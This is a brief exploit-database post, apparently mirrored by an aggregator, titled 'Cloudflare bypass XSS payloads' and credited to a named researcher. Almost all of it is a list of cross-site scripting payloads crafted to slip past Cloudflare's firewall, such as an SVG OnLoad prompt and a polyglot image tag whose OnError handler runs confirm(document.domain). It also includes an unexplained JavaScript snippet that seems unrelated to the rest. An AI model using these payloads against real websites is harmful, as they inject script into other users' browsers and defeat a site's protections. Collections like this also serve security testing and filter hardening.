Cloudflare bypass XSS payloads
2020-10-18 20:21:08 Author: cxsecurity.com(查看原文) 阅读量:559 收藏

#Exploit Title: Cloudflare bypass XSS payloads #Date: 2020-10-18 #Author: Tayfun AKYILDIZ #Linkedin: https://www.linkedin.com/in/tayfun-akyildiz #Tested On: Firefox #XSS Payloads: for(t?c.outerHTmL=o:i=o=’’;i++<1024;o+=`<code onclick=this.innerHTmL=’${M(i)?’*’:n||’·’}’>#</code>${i%64?’’:’<p>’}`)for(n=j=0;j<9;n+=M(i-65+j%3+(j++/3|0)*64))M=i=>i>64&i<960&i%64>1&C(i*i)>.7 javascript:{alert ‘0’ } ≋ "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain) //># ≋ <svg/OnLoad="`${prompt``}`"> Creds: spyerror, bohdansec, Charu Dutt



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2020100110
如有侵权请联系:admin#unsafe.sh